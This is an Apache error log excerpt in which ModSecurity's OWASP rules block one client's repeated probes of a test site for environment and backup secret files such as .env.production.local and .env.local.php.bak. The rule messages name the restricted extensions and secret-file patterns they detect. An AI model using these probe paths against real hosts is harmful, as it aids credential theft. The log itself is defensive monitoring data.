[Fri Jan 16 03:14:14.675975 2026] [:error] [pid 1444034] [client 45.148.10.246:47116] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9uRfEYyDES-ZFL4gjwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php
[Fri Jan 16 03:14:14.676151 2026] [:error] [pid 1444034] [client 45.148.10.246:47116] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php"] [unique_id "aWme9uRfEYyDES-ZFL4gjwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.local.php
[Fri Jan 16 03:14:14.807146 2026] [:error] [pid 1444035] [client 45.148.10.246:47122] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWme9rauW6yeGWXfDeFWUAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local
[Fri Jan 16 03:14:14.807388 2026] [:error] [pid 1444035] [client 45.148.10.246:47122] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWme9rauW6yeGWXfDeFWUAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local
[Fri Jan 16 03:14:14.807568 2026] [:error] [pid 1444035] [client 45.148.10.246:47122] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aWme9rauW6yeGWXfDeFWUAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local
[Fri Jan 16 03:14:14.990533 2026] [:error] [pid 1444032] [client 45.148.10.246:47128] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local/"] [unique_id "aWme9ukMvq8uPO2ZciWojgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local/
[Fri Jan 16 03:14:14.990770 2026] [:error] [pid 1444032] [client 45.148.10.246:47128] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local/"] [unique_id "aWme9ukMvq8uPO2ZciWojgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local/
[Fri Jan 16 03:14:14.990935 2026] [:error] [pid 1444032] [client 45.148.10.246:47128] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production.local/"] [unique_id "aWme9ukMvq8uPO2ZciWojgAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/.env.production.local/
[Fri Jan 16 03:14:15.816173 2026] [:error] [pid 1444033] [client 45.148.10.246:47140] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme99LJkp65ULFQ2YYgmwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local
[Fri Jan 16 03:14:15.816398 2026] [:error] [pid 1444033] [client 45.148.10.246:47140] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme99LJkp65ULFQ2YYgmwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local
[Fri Jan 16 03:14:15.816552 2026] [:error] [pid 1444033] [client 45.148.10.246:47140] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme99LJkp65ULFQ2YYgmwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local
[Fri Jan 16 03:14:15.976731 2026] [:error] [pid 1444034] [client 45.148.10.246:47144] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local/"] [unique_id "aWme9-RfEYyDES-ZFL4gkAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local/
[Fri Jan 16 03:14:15.976966 2026] [:error] [pid 1444034] [client 45.148.10.246:47144] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local/"] [unique_id "aWme9-RfEYyDES-ZFL4gkAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local/
[Fri Jan 16 03:14:15.977128 2026] [:error] [pid 1444034] [client 45.148.10.246:47144] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local/"] [unique_id "aWme9-RfEYyDES-ZFL4gkAAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/.env.staging.local/
[Fri Jan 16 03:14:16.141276 2026] [:error] [pid 1444035] [client 45.148.10.246:47158] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-LauW6yeGWXfDeFWUQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.local
[Fri Jan 16 03:14:16.141503 2026] [:error] [pid 1444035] [client 45.148.10.246:47158] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-LauW6yeGWXfDeFWUQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.local
[Fri Jan 16 03:14:16.141688 2026] [:error] [pid 1444035] [client 45.148.10.246:47158] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-LauW6yeGWXfDeFWUQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//.env.staging.local
[Fri Jan 16 03:14:16.277962 2026] [:error] [pid 1444032] [client 45.148.10.246:47174] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-OkMvq8uPO2ZciWojwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.local
[Fri Jan 16 03:14:16.278192 2026] [:error] [pid 1444032] [client 45.148.10.246:47174] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-OkMvq8uPO2ZciWojwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.local
[Fri Jan 16 03:14:16.278374 2026] [:error] [pid 1444032] [client 45.148.10.246:47174] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging.local"] [unique_id "aWme-OkMvq8uPO2ZciWojwAAAAE"], referer: http://economiasolidale.test.indacotrentino.com/./.env.staging.local
[Fri Jan 16 03:14:16.427225 2026] [:error] [pid 1444226] [client 45.148.10.246:47186] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-GcpoCUgeFICb0bc7wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local
[Fri Jan 16 03:14:16.427448 2026] [:error] [pid 1444226] [client 45.148.10.246:47186] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-GcpoCUgeFICb0bc7wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local
[Fri Jan 16 03:14:16.427606 2026] [:error] [pid 1444226] [client 45.148.10.246:47186] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-GcpoCUgeFICb0bc7wAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local
[Fri Jan 16 03:14:16.614105 2026] [:error] [pid 1444031] [client 45.148.10.246:47190] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local/"] [unique_id "aWme-H-9MmrgwjmYTAJQcwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local/
[Fri Jan 16 03:14:16.614370 2026] [:error] [pid 1444031] [client 45.148.10.246:47190] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local/"] [unique_id "aWme-H-9MmrgwjmYTAJQcwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local/
[Fri Jan 16 03:14:16.615105 2026] [:error] [pid 1444031] [client 45.148.10.246:47190] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local/"] [unique_id "aWme-H-9MmrgwjmYTAJQcwAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/.env.development.local/
[Fri Jan 16 03:14:16.789431 2026] [:error] [pid 1444033] [client 45.148.10.246:47194] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-NLJkp65ULFQ2YYgnAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.development.local
[Fri Jan 16 03:14:16.789666 2026] [:error] [pid 1444033] [client 45.148.10.246:47194] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-NLJkp65ULFQ2YYgnAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.development.local
[Fri Jan 16 03:14:16.789826 2026] [:error] [pid 1444033] [client 45.148.10.246:47194] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-NLJkp65ULFQ2YYgnAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//.env.development.local
[Fri Jan 16 03:14:16.991272 2026] [:error] [pid 1444034] [client 45.148.10.246:47200] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-ORfEYyDES-ZFL4gkQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development.local
[Fri Jan 16 03:14:16.991543 2026] [:error] [pid 1444034] [client 45.148.10.246:47200] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-ORfEYyDES-ZFL4gkQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development.local
[Fri Jan 16 03:14:16.991709 2026] [:error] [pid 1444034] [client 45.148.10.246:47200] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development.local"] [unique_id "aWme-ORfEYyDES-ZFL4gkQAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./.env.development.local
[Fri Jan 16 03:14:17.160977 2026] [:error] [pid 1444035] [client 45.148.10.246:47212] [client 45.148.10.246] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-bauW6yeGWXfDeFWUgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak
[Fri Jan 16 03:14:17.161145 2026] [:error] [pid 1444035] [client 45.148.10.246:47212] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-bauW6yeGWXfDeFWUgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak
[Fri Jan 16 03:14:17.161416 2026] [:error] [pid 1444035] [client 45.148.10.246:47212] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-bauW6yeGWXfDeFWUgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak
[Fri Jan 16 03:14:17.161604 2026] [:error] [pid 1444035] [client 45.148.10.246:47212] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local.php.bak"] [unique_id "aWme-bauW6yeGWXfDeFWUgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/.env.local.php.bak
